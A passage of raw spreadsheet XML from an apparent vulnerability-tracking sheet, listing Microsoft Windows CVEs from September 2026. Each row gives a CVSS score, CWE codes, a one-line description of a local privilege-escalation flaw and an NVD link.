r="Q534" s="5" t="inlineStr" /><c r="R534" s="5" t="inlineStr"><is><t>CWE-122, CWE-197</t></is></c><c r="S534" s="5" t="inlineStr"><is><t>Numeric truncation error in Windows Spaceport.sys allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T534" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69535</t></is></c></row><row r="535"><c r="A535" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B535" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C535" s="5" t="inlineStr"><is><t>CVE-2026-69538</t></is></c><c r="D535" s="5" t="n"><v>7.8</v></c><c r="E535" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F535" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G535" s="5" t="inlineStr" /><c r="H535" s="5" t="n"><v>0.002</v></c><c r="I535" s="5" t="inlineStr" /><c r="J535" s="5" t="inlineStr" /><c r="K535" s="5" t="inlineStr" /><c r="L535" s="5" t="inlineStr" /><c r="M535" s="5" t="inlineStr" /><c r="N535" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O535" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P535" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q535" s="5" t="inlineStr" /><c r="R535" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S535" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to execute code locally.</t></is></c><c r="T535" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69538</t></is></c></row><row r="536"><c r="A536" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B536" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C536" s="5" t="inlineStr"><is><t>CVE-2026-69541</t></is></c><c r="D536" s="5" t="n"><v>7.8</v></c><c r="E536" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F536" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G536" s="5" t="inlineStr" /><c r="H536" s="5" t="n"><v>0.003</v></c><c r="I536" s="5" t="inlineStr" /><c r="J536" s="5" t="inlineStr" /><c r="K536" s="5" t="inlineStr" /><c r="L536" s="5" t="inlineStr" /><c r="M536" s="5" t="inlineStr" /><c r="N536" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O536" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P536" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q536" s="5" t="inlineStr" /><c r="R536" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S536" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T536" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69541</t></is></c></row><row r="537"><c r="A537" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B537" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C537" s="5" t="inlineStr"><is><t>CVE-2026-69542</t></is></c><c r="D537" s="5" t="n"><v>7.8</v></c><c r="E537" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F537" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G537" s="5" t="inlineStr" /><c r="H537" s="5" t="n"><v>0.002</v></c><c r="I537" s="5" t="inlineStr" /><c r="J537" s="5" t="inlineStr" /><c r="K537" s="5" t="inlineStr" /><c r="L537" s="5" t="inlineStr" /><c r="M537" s="5" t="inlineStr" /><c r="N537" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O537" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P537" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q537" s="5" t="inlineStr" /><c r="R537" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S537" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Camera Frame Server Monitor allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T537" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69542</t></is></c></row><row r="538"><c r="A538" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B538" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C538" s="5" t="inlineStr"><is><t>CVE-2026-69544</t></is></c><c r="D538" s="5" t="n"><v>7.8</v></c><c r="E538" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F538" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G538" s="5" t="inlineStr" /><c r="H538" s="5" t="n"><v>0.003</v></c><c r="I538" s="5" t="inlineStr" /><c r="J538" s="5" t="inlineStr" /><c r="K538" s="5" t="inlineStr" /><c r="L538" s="5" t="inlineStr" /><c r="M538" s="5" t="inlineStr" /><c r="N538" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O538" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P538" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q538" s="5" t="inlineStr" /><c r="R538" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S538" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows SMB Client allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T538" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69544</t></is></c></row><row r="539"><c r="A539" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B539" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C539" s="5" t="inlineStr"><is><t>CVE-2026-69561</t></is></c><c r="D539" s="5" t="n"><v>7.8</v></c><c r="E539" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F539" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G539" s="5" t="inlineStr" /><c r="H539" s="5" t="n"><v>0.003</v></c><c r="I539" s="5" t="inlineStr" /><c r="J539" s="5" t="inlineStr" /><c r="K539" s="5" t="inlineStr" /><c r="L539" s="5" t="inlineStr" /><c r="M539" s="5" t="inlineStr" /><c r="N539" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O539" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P539" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q539" s="5" t="inlineStr" /><c r="R539" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S539" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows CD-ROM Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T539" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69561</t></is></c></row><row r="540"><c r="A540" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B540" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C540" s="5" t="inlineStr"><is><t>CVE-2026-69571</t></is></c><c r="D540" s="5" t="n"><v>7.8</v></c><c r="E540" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F540" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G540" s="5" t="inlineStr" /><c r="H540" s="5" t="n"><v>0.003</v></c><c r="I540" s="5" t="inlineStr" /><c r="J540" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K54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40" s="5" t="inlineStr" /><c r="M540" s="5" t="inlineStr" /><c r="N540" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O540" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P540" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q540" s="5" t="inlineStr" /><c r="R540" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S540" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T540" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69571</t></is></c></row><row r="541"><c r="A541" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B541" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C541" s="5" t="inlineStr"><is><t>CVE-2026-69576</t></is></c><c r="D541" s="5" t="n"><v>7.8</v></c><c r="E541" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F541" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G541" s="5" t="inlineStr" /><c r="H541" s="5" t="n"><v>0.003</v></c><c r="I541" s="5" t="inlineStr" /><c r="J541" s="5" t="inlineStr" /><c r="K541" s="5" t="inlineStr" /><c r="L541" s="5" t="inlineStr" /><c r="M541" s="5" t="inlineStr" /><c r="N541" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O541" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P541" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q541" s="5" t="inlineStr" /><c r="R541" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S541" s="5" t="inlineStr"><is><t>Use after free in Graphic Fonts allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T541" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69576</t></is></c></row><row r="542"><c r="A542" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B542" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C542" s="5" t="inlineStr"><is><t>CVE-2026-69580</t></is></c><c r="D542" s="5" t="n"><v>7.8</v></c><c r="E542" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F542" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G542" s="5" t="inlineStr" /><c r="H542" s="5" t="n"><v>0.003</v></c><c r="I542" s="5" t="inlineStr" /><c r="J542" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K54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2" s="5" t="inlineStr" /><c r="M542" s="5" t="inlineStr" /><c r="N542" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O542" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P542" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q542" s="5" t="inlineStr" /><c r="R542" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S542" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T542" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69580</t></is></c></row><row r="543"><c r="A543" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B543" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C543" s="5" t="inlineStr"><is><t>CVE-2026-69582</t></is></c><c r="D543" s="5" t="n"><v>7.8</v></c><c r="E543" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F543" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G543" s="5" t="inlineStr" /><c r="H543" s="5" t="n"><v>0.003</v></c><c r="I543" s="5" t="inlineStr" /><c r="J543" s="5" t="inlineStr" /><c r="K543" s="5" t="inlineStr" /><c r="L543" s="5" t="inlineStr" /><c r="M543" s="5" t="inlineStr" /><c r="N543" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O543" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P543" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q543" s="5" t="inlineStr" /><c r="R543" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S543" s="5" t="inlineStr"><is><t>Buffer over-read in Windows Volume Manager Extension Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T543" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69582</t></is></c></row><row r="544"><c r="A544" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B544" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C544" s="5" t="inlineStr"><is><t>CVE-2026-69583</t></is></c><c r="D544" s="5" t="n"><v>7.8</v></c><c r="E544" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F544" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G544" s="5" t="inlineStr" /><c r="H544" s="5" t="n"><v>0.003</v></c><c r="I544" s="5" t="inlineStr" /><c r="J544" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K54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4" s="5" t="inlineStr" /><c r="M544" s="5" t="inlineStr" /><c r="N544" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O544" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P544" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q544" s="5" t="inlineStr" /><c r="R544" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S544" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T544" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69583</t></is></c></row><row r="545"><c r="A545" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B545" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C545" s="5" t="inlineStr"><is><t>CVE-2026-69584</t></is></c><c r="D545" s="5" t="n"><v>7.8</v></c><c r="E545" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F545" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G545" s="5" t="inlineStr" /><c r="H545" s="5" t="n"><v>0.003</v></c><c r="I545" s="5" t="inlineStr" /><c r="J545" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K54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45" s="5" t="inlineStr" /><c r="M545" s="5" t="inlineStr" /><c r="N545" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O545" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P545" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q545" s="5" t="inlineStr" /><c r="R545" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S545" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T545" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69584</t></is></c></row><row r="546"><c r="A546" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B546" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C546" s="5" t="inlineStr"><is><t>CVE-2026-69585</t></is></c><c r="D546" s="5" t="n"><v>7.8</v></c><c r="E546" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F546" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G546" s="5" t="inlineStr" /><c r="H546" s="5" t="n"><v>0.004</v></c><c r="I546" s="5" t="inlineStr" /><c r="J546" s="5" t="inlineStr" /><c r="K546" s="5" t="inlineStr" /><c r="L546" s="5" t="inlineStr" /><c r="M546" s="5" t="inlineStr" /><c r="N546" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O546" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P546" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q546" s="5" t="inlineStr" /><c r="R546" s="5" t="inlineStr"><is><t>CWE-704</t></is></c><c r="S546" s="5" t="inlineStr"><is><t>Incorrect type conversion or cast in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T546" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69585</t></is></c></row><row r="547"><c r="A547" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B547" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C547" s="5" t="inlineStr"><is><t>CVE-2026-69589</t></is></c><c r="D547" s="5" t="n"><v>7.8</v></c><c r="E547" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F547" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G547" s="5" t="inlineStr" /><c r="H547" s="5" t="n"><v>0.003</v></c><c r="I547" s="5" t="inlineStr" /><c r="J547" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K54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7" s="5" t="inlineStr" /><c r="M547" s="5" t="inlineStr" /><c r="N547" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O547" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P547" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q547" s="5" t="inlineStr" /><c r="R547" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S547" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T547" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69589</t></is></c></row><row r="548"><c r="A548" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B548" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C548" s="5" t="inlineStr"><is><t>CVE-2026-69592</t></is></c><c r="D548" s="5" t="n"><v>7.8</v></c><c r="E548" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F548" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G548" s="5" t="inlineStr" /><c r="H548" s="5" t="n"><v>0.003</v></c><c r="I548" s="5" t="inlineStr" /><c r="J548" s="5" t="inlineStr" /><c r="K548" s="5" t="inlineStr" /><c r="L548" s="5" t="inlineStr" /><c r="M548" s="5" t="inlineStr" /><c r="N548" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O548" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P548" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q548" s="5" t="inlineStr" /><c r="R548" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S548" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Universal Disk Format File System Driver (UDFS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T548" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69592</t></is></c></row><row r="549"><c r="A549" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B549" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C549" s="5" t="inlineStr"><is><t>CVE-2026-69593</t></is></c><c r="D549" s="5" t="n"><v>7.8</v></c><c r="E549" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F549" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G549" s="5" t="inlineStr" /><c r="H549" s="5" t="n"><v>0.003</v></c><c r="I549" s="5" t="inlineStr" /><c r="J549" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K54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9" s="5" t="inlineStr" /><c r="M549" s="5" t="inlineStr" /><c r="N549" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O549" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P549" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q549" s="5" t="inlineStr" /><c r="R549" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S549" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T549" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69593</t></is></c></row><row r="550"><c r="A550" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B550" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C550" s="5" t="inlineStr"><is><t>CVE-2026-69594</t></is></c><c r="D550" s="5" t="n"><v>7.8</v></c><c r="E550" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F550" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G550" s="5" t="inlineStr" /><c r="H550" s="5" t="n"><v>0.003</v></c><c r="I550" s="5" t="inlineStr" /><c r="J550" s="5" t="inlineStr" /><c r="K550" s="5" t="inlineStr" /><c r="L550" s="5" t="inlineStr" /><c r="M550" s="5" t="inlineStr" /><c r="N550" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O550" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P550" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q550" s="5" t="inlineStr" /><c r="R550" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S550" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Local Security Authority Server (lsasrv) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T550" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69594</t></is></c></row><row r="551"><c r="A551" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B551" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C551" s="5" t="inlineStr"><is><t>CVE-2026-69604</t></is></c><c r="D551" s="5" t="n"><v>7.8</v></c><c r="E551" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F551" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G551" s="5" t="inlineStr" /><c r="H551" s="5" t="n"><v>0.003</v></c><c r="I551" s="5" t="inlineStr" /><c r="J551" s="5" t="inlineStr" /><c r="K551" s="5" t="inlineStr" /><c r="L551" s="5" t="inlineStr" /><c r="M551" s="5" t="inlineStr" /><c r="N551" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O551" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P551" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q551" s="5" t="inlineStr" /><c r="R551" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S551" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T551" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69604</t></is></c></row><row r="552"><c r="A552" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B552" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C552" s="5" t="inlineStr"><is><t>CVE-2026-69608</t></is></c><c r="D552" s="5" t="n"><v>7.8</v></c><c r="E552" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F552" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G552" s="5" t="inlineStr" /><c r="H552" s="5" t="n"><v>0.003</v></c><c r="I552" s="5" t="inlineStr" /><c r="J552" s="5" t="inlineStr" /><c r="K552" s="5" t="inlineStr" /><c r="L552" s="5" t="inlineStr" /><c r="M552" s="5" t="inlineStr" /><c r="N552" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O552" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P552" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q552" s="5" t="inlineStr" /><c r="R552" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S552" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T552" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69608</t></is></c></row><row r="553"><c r="A553" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B553" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C553" s="5" t="inlineStr"><is><t>CVE-2026-69612</t></is></c><c r="D553" s="5" t="n"><v>7.8</v></c><c r="E553" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F553" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G553" s="5" t="inlineStr" /><c r="H553" s="5" t="n"><v>0.004</v></c><c r="I553" s="5" t="inlineStr" /><c r="J553" s="5" t="inlineStr" /><c r="K553" s="5" t="inlineStr" /><c r="L553" s="5" t="inlineStr" /><c r="M553" s="5" t="inlineStr" /><c r="N553" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O553" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P553" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q553" s="5" t="inlineStr" /><c r="R553" s="5" t="inlineStr"><is><t>CWE-36</t></is></c><c r="S553" s="5" t="inlineStr"><is><t>Absolute path traversal in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T553" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69612</t></is></c></row><row r="554"><c r="A554" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B554" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C554" s="5" t="inlineStr"><is><t>CVE-2026-69685</t></is></c><c r="D554" s="5" t="n"><v>7.8</v></c><c r="E554" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F554" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G554" s="5" t="inlineStr" /><c r="H554" s="5" t="n"><v>0.003</v></c><c r="I554" s="5" t="inlineStr" /><c r="J554" s="5" t="inlineStr" /><c r="K554" s="5" t="inlineStr" /><c r="L554" s="5" t="inlineStr" /><c r="M554" s="5" t="inlineStr" /><c r="N554" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O554" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P554" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q554" s="5" t="inlineStr" /><c r="R554" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S554" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Kerberos allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T554" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69685</t></is></c></row><row r="555"><c r="A555" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B555" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C555" s="5" t="inlineStr"><is><t>CVE-2026-69687</t></is></c><c r="D555" s="5" t="n"><v>7.8</v></c><c r="E555" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F555" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G555" s="5" t="inlineStr" /><c r="H555" s="5" t="n"><v>0.003</v></c><c r="I555" s="5" t="inlineStr" /><c r="J555" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K55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55" s="5" t="inlineStr" /><c r="M555" s="5" t="inlineStr" /><c r="N555" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O555" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P555" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q555" s="5" t="inlineStr" /><c r="R555" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="S555" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T555" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69687</t></is></c></row><row r="556"><c r="A556" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B556" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C556" s="5" t="inlineStr"><is><t>CVE-2026-69691</t></is></c><c r="D556" s="5" t="n"><v>7.8</v></c><c r="E556" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F556" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G556" s="5" t="inlineStr" /><c r="H556" s="5" t="n"><v>0.003</v></c><c r="I556" s="5" t="inlineStr" /><c r="J556" s="5" t="inlineStr" /><c r="K556" s="5" t="inlineStr" /><c r="L556" s="5" t="inlineStr" /><c r="M556" s="5" t="inlineStr" /><c r="N556" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O556" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P556" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q556" s="5" t="inlineStr" /><c r="R556" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S556" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Spaceport.sys allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T556" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69691</t></is></c></row><row r="557"><c r="A557" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B557" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C557" s="5" t="inlineStr"><is><t>CVE-2026-69707</t></is></c><c r="D557" s="5" t="n"><v>7.8</v></c><c r="E557" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F557" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G557" s="5" t="inlineStr" /><c r="H557" s="5" t="n"><v>0.003</v></c><c r="I557" s="5" t="inlineStr" /><c r="J557" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K55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57" s="5" t="inlineStr" /><c r="M557" s="5" t="inlineStr" /><c r="N557" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O557" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P557" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q557" s="5" t="inlineStr" /><c r="R557" 